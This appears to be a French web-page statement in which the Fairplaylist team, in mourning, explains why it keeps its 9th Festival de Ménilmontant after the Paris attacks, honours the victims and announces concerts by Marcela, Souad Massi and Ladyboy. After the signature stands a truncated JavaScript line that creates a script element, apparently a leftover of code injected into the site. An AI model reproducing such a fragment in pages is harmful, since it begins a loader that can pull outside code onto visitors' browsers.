Abasourdis par les attentats de Paris nous nous sommes posés la question d’annuler le Festival de Ménilmontant. Mais nous nous sommes dit que ce 9
ème Festival devait avoir lieu. Qu’il était un moyen parmi tant d’autres de dire NON à ceux qui à travers le monde répandent la terreur. Nous nous associons à la douleur des familles des victimes de tous les attentats de Paris, Beyrouth, Ankara et de l’Airbus de la compagnie Metrojet dans le Sinaï égyptien. Nous pensons aux regards qui vont manquer, aux mains qui ne seront plus caressées, aux baisers qui ne seront plus offerts.

D’A-WA à Souad Massi en passant par Marcela, comme chaque année notre volonté est de faire découvrir ou redécouvrir la diversité culturelle et musicale que nous mettons tant en avant depuis plus de10 ans. Cette année, nous avons programmé majoritairement des femmes. Qu’elles soient originaires d’Europe Centrale, du Yémen, d’Israël,  d’Algérie ou de France, elles représentent tout ce que ces assassins détestent car elles sont libres. Libres de chanter, libres de vous offrir leur musique et departager avec vous leurs émotions.

C’est pour ces raisons que nous avons décidé de poursuivre notre aventure avec vous. En mémoire à toutes les victimes qui subissent l’obscurantisme et la violence d’hommes qui ne représentent qu’eux même.

Nous défendons depuis plus de 10 ans une filière éthique et solidaire dans ce qu’on nomme « l’industrie musicale ». Nous défendons une filière qui remet l’artiste, le public au centre du jeu. Nous défendons un brassage culturel qui rapproche les peuples et leurs donnent à écouter et voir ce qui se fait de plus beau.

C’est pout tout cela que nous vous attendons dès dimanche à l’Alimentation Générale pour danser sur le bal Tzigane de Marcela et los Murchales, que nous vous attendons pour chanter et danser sur la musique de Souad Massi le 24 novembre au Petit Bain et que nous vous invitons à allez découvrir le beau projet de Ladyboy le 25 novembre à la Manufacture de la Chanson.

 
L’équipe de Fairplaylist, en deuil

var d=document;var s=d.createElement(‘script’);